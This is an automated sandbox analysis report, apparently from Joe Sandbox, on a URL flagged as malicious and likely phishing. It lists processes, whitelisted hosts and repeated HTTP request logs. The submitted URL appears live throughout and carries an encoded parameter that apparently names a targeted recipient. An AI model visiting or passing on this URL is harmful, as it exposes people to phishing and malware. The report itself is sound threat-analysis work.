Edit tour

macOS Analysis Report
https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$

Overview

General Information

Sample URL:https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
Analysis ID:1645253
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1645253
Start date and time:2025-03-21 15:27:53 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:browseurl.jbs
Sample URL:https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
Analysis system description:Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:10.14
CPU architecture:x86_64
Analysis Mode:default
Detection:MAL
Classification:mal48.mac@0/14@5/0
  • Excluded IPs from analysis (whitelisted): 23.44.104.28, 54.173.154.19, 3.229.240.232, 74.125.138.95, 184.24.37.120, 17.253.7.140, 17.253.7.141, 17.253.7.143, 17.36.200.79, 17.253.7.135, 17.253.7.133
  • Excluded domains from analysis (whitelisted): smoot-searchv2.v.aaplimg.com, e11408.d.akamaiedge.net, updates.cdn-apple.com.akadns.net, crl.apple.com, itunes.apple.com.edgekey.net, safebrowsing.googleapis.com, help.apple.com, init.itunes.apple.com, mesu-cdn.apple.com.akadns.net, lcdn-locator-usuqo.apple.com.akadns.net, e673.dsce9.akamaiedge.net, help-ar.apple.com.edgekey.net, api.smoot.apple.com, bag-smoot.v.aaplimg.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, configuration.apple.com, mesu-cdn.origin-apple.com.akadns.net, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, configuration.apple.com.akadns.net, configuration.apple.com.edgekey.net, mesu.apple.com, updates.cdn-apple.com, init-cdn.itunes-apple.com.akadns.net, api2.smoot.apple.com
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
  • System is macvm-mojave
  • open (MD5: 34bd93241fa5d2aee225941b1ca14fa4) Arguments: /usr/bin/open -a Safari https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__ !!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$
  • Safari (MD5: 2dde28c2f8a38ed2701ba17a0893cbc1) Arguments: /Applications/Safari.app/Contents/MacOS/Safari
  • silhouette (MD5: 485ec1bd3cd09293e26d05f6fe464bfd) Arguments: /usr/libexec/silhouette
  • nsurlstoraged (MD5: 321b0a40e24b45f0af49ba42742b3f64) Arguments: /usr/libexec/nsurlstoraged --privileged
  • eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$Avira URL Cloud: detection malicious, Label: malware
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49353 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.59.250:443 -> 192.168.11.12:49369 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.229:443 -> 192.168.11.12:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.11.12:49387 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.66.42.211:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.59.250:443 -> 192.168.11.12:49422 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.59.250:443 -> 192.168.11.12:49424 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49474 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49475 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49479 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49483 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49484 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49485 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49486 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.195.6
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 17.248.200.64
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.3.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.3.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.3.6
Source: unknownTCP traffic detected without corresponding DNS query: 151.101.3.6
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /npm/ua-parser-js@1.0.38/src/ua-parser.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /data/icons/ionicons/512/icon-close-round-512.png HTTP/1.1Host: cdn4.iconfinder.comConnection: keep-aliveAccept: image/png,image/svg+xml,image/*;q=0.8,video/*;q=0.8,*/*;q=0.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
